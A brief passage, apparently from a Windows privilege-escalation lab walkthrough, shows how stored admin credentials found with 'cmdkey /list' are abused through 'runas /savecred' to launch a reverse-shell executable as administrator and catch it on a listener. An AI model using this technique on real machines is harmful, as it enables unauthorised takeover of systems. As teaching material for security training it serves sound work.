now we will escalate via saved creds on windows

cmdkey /list

as we see we got the admin creds saved on the machine so let’s exploit it

runas /savecred /user:admin C:\\PrivEsc\\reverse.exe

as we see it’s executed as admin user without asking for password so let’s go and check our listener

as we see now we are the admin user on this machine